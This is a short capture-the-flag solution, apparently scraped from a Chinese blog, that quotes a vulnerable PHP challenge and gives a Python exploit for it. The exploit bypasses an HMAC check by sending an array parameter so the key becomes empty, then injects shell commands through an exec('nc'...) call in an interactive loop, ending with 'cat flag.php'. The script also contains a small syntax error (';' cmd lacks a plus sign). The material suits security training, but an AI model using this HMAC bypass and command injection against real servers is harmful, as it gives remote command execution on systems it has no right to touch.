代码语言:javascript复制
import requests
import hmac,re
from urllib.parse import quote,unquote
'''
if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){
die('谁!竟敢踩我一只耳的尾巴!');
}
$clandestine = getenv("clandestine");
S
if(isset($_POST['White-cat-monitor']))
$clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);
$hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);
if($hh !== $_POST['Black-Cat-Sheriff']){
die('有意瞄准,无意击发,你的梦想就是你要瞄准的目标。相信自己,你就是那颗射中靶心的子弹。');
}
echo exec("nc".$_POST['One-ear']);
'''
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Edg/85.0.564.44'
}
def getShell(cmd):
url = '你猜猜地址'
payload = {
'Black-Cat-Sheriff':'',
'One-ear':';' cmd,
'White-cat-monitor[]':'30',
}
payload['Black-Cat-Sheriff'] = hmac.new(b'',payload['One-ear'].encode(),digestmod='sha256').hexdigest()
response = requests.post(url,payload,headers).text
print(re.search('.*?<b>63</b><br />n(.*)',response).groups(1)[0])
if __name__ == "__main__":
cmd = input('> ')
while cmd != 'quit':
getShell(cmd)
cmd = input('> ')输入:
代码语言:javascript复制cat flag.php就有flag了
